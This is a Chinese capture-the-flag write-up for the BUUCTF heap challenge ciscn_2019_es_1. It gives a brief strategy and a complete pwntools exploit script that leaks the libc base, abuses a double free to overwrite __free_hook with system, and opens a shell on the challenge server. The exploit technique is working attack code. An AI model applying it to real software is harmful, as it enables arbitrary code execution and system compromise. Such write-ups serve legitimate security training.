BUUCTF ciscn_2019_es_1

思路

首先申请一个smallbin大小的trunk然后释放打印得到libc基址,然后double free打fastbin attack之后写到libc去__malloc_hook写入one_gadget再次add获取shell
以下为ubuntu16的环境下本地也就是libc-2.23
这里题目是ubuntu18利用更加简单直接打free_hook
exp:

#!/usr/bin/python2
from pwn import *
local=0
if local==1:
    p=process('./ciscn_2019_es_1')
    elf=ELF('./ciscn_2019_es_1')
    libc=elf.libc
else:
    p=remote('node3.buuoj.cn',27202)
    elf=ELF('./ciscn_2019_es_1')
    libc=elf.libc

def add(size,name,compary):
    p.sendlineafter('choice:','1')
    p.sendlineafter('name',str(size))
    p.sendlineafter('name:',name)
    p.sendlineafter('call:',compary)

def show(idx):
    p.sendlineafter('choice:','2')
    p.sendlineafter('index:',str(idx))

def call(idx):
    p.sendlineafter('choice:','3')
    p.sendlineafter('index:',str(idx))

lg=lambda address,data:log.success('%s: '%(address)+hex(data))

def exp():
    add(0x410,'doudou','137')#0
    add(0x28,'doudou2','139')#1
    add(0x68,'/bin/sh\x00','139')#2
    add(0x30,'doudou1','138')#3
    call(0)
    show(0)
    libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-96-0x10-libc.sym['__malloc_hook']
    malloc_hook=libcbase+libc.sym['__malloc_hook']
    one_gadget=libcbase+0x4f322
    free_hook=libcbase+libc.sym['__free_hook']
    system=libcbase+libc.sym['system']
    call(1)
    call(1)
    add(0x28,p64(free_hook),'141')
    add(0x28,'111','142')
    add(0x28,p64(system),'143')
    call(2)
    lg('libcbase',libcbase)
    p.interactive()

if __name__=="__main__":
    exp()